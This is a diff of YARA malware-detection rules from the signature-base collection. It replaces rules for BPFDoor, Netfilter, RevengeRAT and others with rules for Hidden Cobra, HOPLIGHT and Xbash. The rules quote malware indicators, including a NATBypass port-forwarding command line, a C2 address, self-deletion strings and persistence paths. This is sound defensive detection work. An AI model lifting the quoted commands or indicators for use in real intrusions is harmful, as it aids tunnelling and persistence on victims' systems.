+		hash1 = "4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff"
 
 	strings:
-		$s1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
-		$s2 = "/sbin/mingetty /dev" ascii fullword
-		$s3 = "pickup -l -t fifo -u" ascii fullword
+		$x1 = "nb -slave 127.0.0.1:3389 8.8.8.8:1997" ascii
+		$x2 = "| Welcome to use NATBypass Ver" ascii
+		$s1 = "main.port2host.func1" ascii fullword
+		$s2 = "start to transmit address:" ascii
+		$s3 = "^(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or all of them
+		filesize < 8000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_Generic_May22_1 : FILE
+rule SIGNATURE_BASE_Hiddencobra_Rule_1
 {
 	meta:
-		description = "Detects BPFDoor malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d30df2ae-7008-53c0-9a61-8346a9c9f465"
-		date = "2022-05-09"
+		description = "Detects Hidden Cobra Malware"
+		author = "US CERT"
+		id = "921c027e-fac3-5419-b0a6-5043f5cde466"
+		date = "2017-06-13"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L121-L156"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L11-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57ae5f7dc1d202fe66d6626ef2bf2278b92bec0310449ce049bdaeaec5657c77"
-		score = 90
+		logic_hash = "e8bb844d72b7d7564caec0d0842889000c77611eeb24ac5c5cb35072a92c9d10"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
-		hash2 = "1925e3cd8a1b0bba0d297830636cdb9ebf002698c8fa71e0063581204f4e8345"
-		hash3 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
-		hash4 = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
-		hash5 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
-		hash6 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
-		hash7 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
-		hash8 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
-		hash9 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
-		hash10 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
-		hash11 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
-		hash12 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
-		hash13 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
-		hash14 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
-		hash15 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
-		hash16 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
-		hash17 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
+		tags = ""
 
 	strings:
-		$op1 = { c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 ?? 88 45 }
-		$op2 = { 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 }
-		$op3 = { 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 88 45 f? c7 45 f8 00 00 00 00 }
-		$op4 = { 48 89 7d d8 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? }
-		$op5 = { 48 8b 45 ?8 c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 }
-		$op6 = { 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 }
+		$rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94
+            A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77
+            48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39
+            73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2
+            AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED
+            39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68
+            3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13
+            B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Chinese_Keyboard_Layout
+rule SIGNATURE_BASE_Hiddencobra_Rule_3
 {
 	meta:
-		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Chinese keyboard layout"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f901818b-5150-540f-b645-686c12784a38"
-		date = "2019-10-12"
-		modified = "2020-12-16"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/log_teamviewer_keyboard_layouts.yar#L2-L21"
+		description = "Detects Hidden Cobra Malware"
+		author = "US CERT"
+		id = "39c7e039-4b07-575d-a93a-539ecc4e63d8"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-164A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L52-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba3bc7cbdfc5a47f6bc4cd9049c52eb95d25465af107ae3d068ef785b714279a"
-		score = 60
+		logic_hash = "6c0e385e46fe9d6cde7d2bc8ef059cfd8c33ef5b17e9fcd7cea97863fb8d2c24"
+		score = 75
 		quality = 85
 		tags = ""
-		limit = "Logscan"
 
 	strings:
-		$x1 = "Changing keyboard layout to: 0804" ascii
-		$x2 = "Changing keyboard layout to: 042a"
-		$fp1 = "Changing keyboard layout to: 08040804" ascii
-		$fp2 = "Changing keyboard layout to: 042a042a" ascii
+		$randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7
+         44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41
+         00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0
+         6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24
+         48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89
+         44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24
+         18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89
+         44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00
+         66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B
+         6C 24 5C A1 ?? ?? ?? ?? F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05
+         83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00
+         00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B
+         FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2
+         49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33
+         C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83
+         E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00
+         8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1
+         C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8
+         ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4
+         48 C3 }
 
 	condition:
-		(#x1 + #x2 ) > ( #fp1 + #fp2 )
+		$randomUrlBuilder
 }
-rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Russian_Keyboard_Layout
+rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_1 : FILE
 {
 	meta:
-		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Russian keyboard layout"
+		description = "Detects Hidden Cobra Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "360a1cca-2a64-5fd8-bcde-f49e1b17281e"
-		date = "2019-10-12"
-		modified = "2022-12-07"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/log_teamviewer_keyboard_layouts.yar#L23-L40"
+		id = "d6955294-84a4-5694-87c9-b5b1c39e0fae"
+		date = "2018-08-11"
+		modified = "2023-12-05"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L87-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9de52ec41fb410fcff50d49eb7871eadd07b520c3cfa089e1eeecc580e610eaa"
-		score = 60
+		logic_hash = "b1e72ca66520152b444cc415bdf54921ebba9671519d3b0327316cee2bf0ba1d"
+		score = 75
 		quality = 85
-		tags = ""
-		limit = "Logscan"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "05a567fe3f7c22a0ef78cc39dcf2d9ff283580c82bdbe880af9549e7014becfc"
 
 	strings:
-		$x1 = "Changing keyboard layout to: 0419" ascii
-		$fp1 = "Changing keyboard layout to: 04190419" ascii
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "PROXY_SVC_DLL.dll" fullword ascii
 
 	condition:
-		#x1> #fp1
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Netfilter_Dropper_Jun_2021_1_1 : FILE
+rule SIGNATURE_BASE_APT_Hiddencobra_Ghostsecret_2 : FILE
 {
 	meta:
-		description = "Detects the dropper of Netfilter rootkit"
-		author = "Arkbird_SOLG"
-		id = "d91f48aa-9580-572d-a72c-19b80624cdbe"
-		date = "2020-06-18"
+		description = "Detects Hidden Cobra Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dab5b0ec-ae89-521e-bbb9-15602db9ed6c"
+		date = "2018-08-11"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_netfilter.yar#L4-L26"
+		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b70eb5d2d234d0f523c41fa146f315cf7239bbe7a988b393e75ea6cf6aa438d3"
+		logic_hash = "878711f5e1a8a3cfefdaf13fc08a4778fba9d2f729248784cf72b610c8bc5e17"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
-		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
-		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "45e68dce0f75353c448865b9abafbef5d4ed6492cd7058f65bf6aac182a9176a"
 
 	strings:
-		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
-		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
-		$s1 = "%s\\netfilter.sys" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
-		$s3 = "\\\\.\\netfilter" fullword ascii
+		$s1 = "ping 127.0.0.1 -n 3" fullword wide
+		$s2 = "Process32" fullword ascii
+		$s11 = "%2d%2d%2d%2d%2d%2d" fullword ascii
+		$s12 = "del /a \"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and filesize < 1000KB and ( all of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Netfilter_May_2021_1_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_1 : FILE
 {
 	meta:
-		description = "Detects Netfilter rootkit"
-		author = "Arkbird_SOLG"
-		id = "0ac01eb3-435b-52b0-b8e8-ace2ebb34f60"
-		date = "2020-06-18"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "923a0812-f375-5c0c-a22c-fc71ddcad4e3"
+		date = "2019-04-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_netfilter.yar#L28-L52"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L124-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba72bbc38c27d0c8d6eea7d513c3ca40276edd929c93abae4098639f7d7649a5"
+		logic_hash = "6cd036129ea54f4e3a2c52bf9ebd04e2d368e737cf83ca34a8feb79ea477a3af"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
-		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
-		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
-		tlp = "White"
-		adversary = "Chinese APT Group"
+		hash1 = "d77fdabe17cdba62a8e728cbe6c740e2c2e541072501f77988674e07a05dfb39"
 
 	strings:
-		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
-		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
-		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
-		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
-		$s1 = "%sc=%s" fullword ascii
-		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
-		$s3 = "NETIO.SYS" fullword ascii
+		$s1 = "www.naver.com" fullword ascii
+		$s2 = "PolarSSL Test CA0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and filesize < 1000KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Revengerat_Sep17 : FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_2 : FILE
 {
 	meta:
-		description = "Detects RevengeRAT malware"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e58af06-a0ce-532c-9483-b1eca5e3cc28"
-		date = "2017-09-04"
-		modified = "2020-07-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_revenge_rat.yar#L11-L34"
+		id = "9c7fd381-272a-5cfc-a7ee-7f0f9221fa04"
+		date = "2019-04-13"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L139-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "467133402d6898f325cfd8c18308fc2a4dafd06c8624f9347225f16afd4035ce"
+		logic_hash = "741d69b470ac230d502116ebd5f09bbf4bdbbbdd7e70b97a4bd5d3f2c8e148ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a"
-		hash2 = "7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213"
-		hash3 = "fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967"
+		hash1 = "70034b33f59c6698403293cdc28676c7daa8c49031089efa6eefce41e22dccb3"
 
 	strings:
-		$x1 = "Nuclear Explosion.g.resources" fullword ascii
-		$x4 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
-		$x5 = "\\RevengeRAT\\" ascii
-		$x6 = "Revenge-RAT client has been successfully installed." ascii
-		$x7 = "Nuclear Explosion.exe" fullword ascii
-		$x8 = " Revenge-RAT 201" wide
-		$s1 = "{11111-22222-20001-00001}" fullword wide
+		$s1 = "%SystemRoot%\\System32\\svchost.exe -k mdnetuse" fullword ascii
+		$s2 = "%s\\hid.dll" fullword ascii
+		$s3 = "%Systemroot%\\System32\\" ascii
+		$s4 = "SYSTEM\\CurrentControlSet\\services\\%s\\Parameters" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_Donotteam_Ytyframework : APT DONOTTEAM WINDOWS FILE
+rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_3 : FILE
 {
 	meta:
-		description = "Modular malware framework with similarities to EHDevel"
-		author = "James E.C, ProofPoint"
-		id = "6dd07019-aa5a-5966-8331-b6f6758b0652"
-		date = "2018-08-03"
+		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "683b4d64-575a-5bdb-9ad8-e10a60037032"
+		date = "2019-04-13"
 		modified = "2023-12-05"
-		reference = "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_donotteam_ytyframework.yar#L3-L43"
+		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hidden_cobra.yar#L156-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1e0c1b97925e1ed90562d2c68971e038d8506b354dd6c1d2bcc252d2a48bc31c"
-		logic_hash = "8e2841fd4550f12d88fb451a893f1ba41f0d3c123d9c195fe97366202376ef61"
+		logic_hash = "5cbdf0c4c5025bc1d95d27a32fa69efb329e8f74243646a31458fea225d21875"
 		score = 75
-		quality = 83
-		tags = "APT, DONOTTEAM, WINDOWS, FILE"
+		quality = 85
+		tags = "FILE"
+		hash1 = "2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525"
+		hash2 = "05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461"
+		hash3 = "ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d"
 
 	strings:
-		$x1 = "/football/download2/" ascii wide
-		$x2 = "/football/download/" ascii wide
-		$x3 = "Caption: Xp>" wide
-		$x_c2 = "5.135.199.0" ascii fullword
-		$a1 = "getGoogle" ascii fullword
-		$a2 = "/q /noretstart" wide
-		$a3 = "IsInSandbox" ascii fullword
-		$a4 = "syssystemnew" ascii fullword
-		$a5 = "ytyinfo" ascii fullword
-		$a6 = "\\ytyboth\\yty " ascii
-		$s1 = "SELECT Name FROM Win32_Processor" wide
-		$s2 = "SELECT Caption FROM Win32_OperatingSystem" wide
-		$s3 = "SELECT SerialNumber FROM Win32_DiskDrive" wide
-		$s4 = "VM: Yes" wide fullword
-		$s5 = "VM: No" wide fullword
-		$s6 = "helpdll.dll" ascii fullword
-		$s7 = "boothelp.exe" ascii fullword
-		$s8 = "SbieDll.dll" wide fullword
-		$s9 = "dbghelp.dll" wide fullword
-		$s10 = "YesNoMaybe" ascii fullword
-		$s11 = "saveData" ascii fullword
-		$s12 = "saveLogs" ascii fullword
+		$s1 = "Oleaut32.dll" fullword ascii
+		$s2 = "Process32NextA" fullword ascii
+		$s3 = "Process32FirstA" fullword ascii
+		$s4 = "%sRSA key size  : %d bits" fullword ascii
+		$s5 = "emailAddress=" fullword ascii
+		$s6 = "%scert. version : %d" fullword ascii
+		$s7 = "www.naver.com" fullword ascii
+		$x1 = "ztretrtireotreotieroptkierert" fullword ascii
+		$x2 = "reykfgkodfgkfdskgdfogpdokgsdfpg" fullword ascii
+		$x3 = "fjiejffndxklfsdkfjsaadiepwn" fullword ascii
+		$x4 = "fgwljusjpdjah" fullword ascii
+		$x5 = "udbcgiut.dat" fullword ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and ( pe.imphash ( ) == "87775285899fa860b9963b11596a2ded" or 1 of ( $x* ) or 3 of ( $a* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Bernhardpos
+rule SIGNATURE_BASE_MAL_Xbash_PY_Sep18 : FILE
 {
 	meta:
-		description = "BernhardPOS Credit Card dumping tool"
-		author = "Nick Hoffman / Jeremy Humble"
-		id = "9b9e1507-cf1b-5653-beaa-458205e367c3"
-		date = "2015-07-14"
+		description = "Detects Xbash malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "97512fe8-002f-5cbc-a915-d55c087fbef7"
+		date = "2018-09-18"
 		modified = "2023-12-05"
